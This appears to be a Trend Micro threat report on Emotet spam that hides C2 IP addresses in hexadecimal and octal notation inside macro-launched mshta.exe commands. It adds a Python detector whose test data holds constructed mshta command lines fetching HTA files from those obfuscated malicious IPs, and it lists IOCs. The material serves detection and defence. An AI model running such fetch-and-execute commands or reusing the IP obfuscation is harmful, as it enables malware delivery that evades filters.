Trend Micro: Emotet Spam Abuses Unconventional IP Address Formats to Spread Malware


We have observed Emotet spam campaigns using hexadecimal and octal representations of IP addresses, which may escape detection based on pattern matching. Both routines use social engineering to trick users into enabling document macros, which then automate the execution of the malware. When handed these non-standard notations, operating systems (OS) automatically convert the values to dotted-quad decimal form before initiating the request to the remote server. Users and businesses are advised to detect and block this activity and to enable the relevant security measures to prevent compromise, since Emotet is used for second-stage delivery of malware such as TrickBot and Cobalt Strike.

Routine using hexadecimal IP addresses

The samples we found begin with a document attached to an email that uses Excel 4.0 macros, an outdated feature for automating repetitive tasks in Excel that malicious actors have abused to spread malware. In this case, the abused feature lets the malware run as soon as the document is opened, via the auto_open macro.

Figure 1. Document Attachment in Email Prompts Users to Enable Macros

The URL is masked with carets and the host contains a hexadecimal representation of the IP address. Using CyberChef, we converted the hexadecimal numbers to find the most commonly used dotted decimal equivalent, 193[.]42[.]36[.]245.

Figure 2. Using carets for obfuscation

Figure 3. Converting hexadecimal numbers to dotted-decimal representation

When executed, the macro invokes cmd.exe > mshta.exe with the URL containing the hexadecimal representation of the IP address as an argument, which downloads and executes an HTML Application (HTA) file from the remote host.

Figure 4. Downloading and running an HTA file

Routine using octal IP addresses

Just like the hexadecimal sample, this document also uses Excel 4.0 macros to execute the malware once the document is opened and the macros are enabled. The URL is likewise masked with carets, but the IP address is written in octal. We again used CyberChef to decode the IP address into dotted-quad format, 46[.]105[.]81[.]76.

Figure 5. Using the same technique as the hexadecimal routine, but with an octal representation for obfuscation

Figure 6. Conversion of octal numbers to dotted decimal representation

As seen in the process tree, when executed, the macro likewise invokes cmd.exe > mshta.exe with the URL as an argument to download and execute an HTA file from the remote host.

Figure 7. Downloading and running an HTA file

Conclusion

Traces of Emotet were observed indiscriminately dropping Cobalt Strike beacons between November and December 2021. Earlier this year, however, the operators became noticeably more selective about which targets received the beacons. Evasion techniques like these can be seen as proof that the attackers continue to innovate in order to thwart pattern-based detection solutions.

In addition, the unconventional use of hexadecimal and octal IP addresses can get past current solutions based on pattern matching. Along the same lines, though, the unusual command line is itself a detection opportunity: security teams can add filters that treat these IP address representations as suspicious and associate them with malicious software.
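The conversions performed with CyberChef in the two routines above (hexadecimal and octal hosts to dotted decimal), and the detection filter suggested here, can be reproduced in a few lines. The following is an added example, not code from Trend Micro or from the samples: it normalizes a numeric host the way the classic BSD inet_aton parser does (dotted parts in hex, octal or decimal, with fewer than four parts filling the low-order bytes), strips the cmd.exe caret escaping the article describes, and flags any URL host that resolves to an IP but is not written in plain dotted decimal. The command lines and URL paths below are constructed for the example and are not the actual strings from the samples; only the two IP addresses come from the article.

```python
import re
from typing import List, Optional, Tuple

# Constructed command lines, shaped like the mshta.exe invocations the article
# describes but not the samples' real strings (paths are placeholders).
SAMPLE_COMMAND_LINES = [
    "mshta.exe http://0xc12a24f5/placeholder.hta",          # whole address as one hex number
    "mshta.exe http://0056.0151.0121.0114/placeholder.hta", # dotted octal
    "m^s^h^t^a^.^e^x^e h^t^t^p^:^/^/0xc1.0x2a.0x24.0xf5/placeholder.hta",  # caret-masked, dotted hex
    "mshta.exe http://193.42.36.245/placeholder.hta",       # conventional dotted decimal
    "mshta.exe http://example.invalid/placeholder.hta",     # hostname, not numeric
]

HOST_RE = re.compile(r"https?://([^/\s:?#@]+)", re.IGNORECASE)


def parse_inet_aton(host: str) -> Optional[str]:
    """Normalize an inet_aton-style numeric host to dotted decimal.

    Assumed to mirror classic BSD inet_aton semantics: one to four parts
    separated by dots; '0x' prefix means hex, a leading '0' means octal,
    anything else decimal. When fewer than four parts are given, the last
    part supplies all remaining low-order bytes ("193.42.9461" is valid).
    Returns None if the host is not a numeric address in this grammar.
    """
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    values = []
    for part in parts:
        if re.fullmatch(r"0[xX][0-9a-fA-F]+", part):
            values.append(int(part, 16))
        elif re.fullmatch(r"0[0-7]*", part):
            values.append(int(part, 8))
        elif re.fullmatch(r"[1-9][0-9]*", part):
            values.append(int(part, 10))
        else:
            return None
    # Every part but the last is exactly one byte; the last covers the rest.
    if any(v > 0xFF for v in values[:-1]):
        return None
    last_width = 4 - (len(values) - 1)
    if values[-1] >= 1 << (8 * last_width):
        return None
    addr = 0
    for v in values[:-1]:
        addr = (addr << 8) | v
    addr = (addr << (8 * last_width)) | values[-1]
    return ".".join(str((addr >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def is_conventional_dotted_decimal(host: str) -> bool:
    """True only for four decimal octets with no leading zeros (the form most
    pattern-based signatures are written against)."""
    parts = host.split(".")
    return len(parts) == 4 and all(
        re.fullmatch(r"0|[1-9][0-9]{0,2}", p) and int(p) <= 255 for p in parts
    )


def find_obfuscated_ip_hosts(command_line: str) -> List[Tuple[str, str]]:
    """Return (host_as_written, normalized_ip) for every URL host in the
    command line that is a numeric IP but not plain dotted decimal.

    Carets are removed first because cmd.exe treats '^' as an escape
    character and drops it before the argument reaches mshta.exe.
    """
    unmasked = command_line.replace("^", "")
    hits = []
    for host in HOST_RE.findall(unmasked):
        normalized = parse_inet_aton(host)
        if normalized is not None and not is_conventional_dotted_decimal(host):
            hits.append((host, normalized))
    return hits


def scan_samples() -> List[Tuple[str, str]]:
    """Run the detection over the constructed command lines."""
    hits = []
    for line in SAMPLE_COMMAND_LINES:
        hits.extend(find_obfuscated_ip_hosts(line))
    return hits


if __name__ == "__main__":
    for written, normalized in scan_samples():
        print(f"suspicious host {written!r} -> {normalized}")
```

Running the script reports the three obfuscated hosts and resolves them to the two addresses listed under IOCs, while the conventional dotted-decimal URL and the hostname produce no alert. The normalized value is what a filter should compare against a blocklist, since the as-written host is exactly what the obfuscation is designed to make unrecognizable.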

Indicators of Compromise (IOC)

SHA256: e492f31ca20d99888b2434dcb4d9af1f93ed4c485b9bd2bc550ce8ae8021b9cd
Description: Hexadecimal IP address sample
Detection: Trojan.XF.HIDDBOOK.SMTH

SHA256: 3e9701129f13f13f7b873f55dc3d43d04cbd1dd3f85814270bb1b177394926b5
Description: Octal IP address sample
Detection: Trojan.XF.EMOTET.SMYXBLAA

URLs

193[.]42[.]36[.]245

46[.]105[.]81[.]76
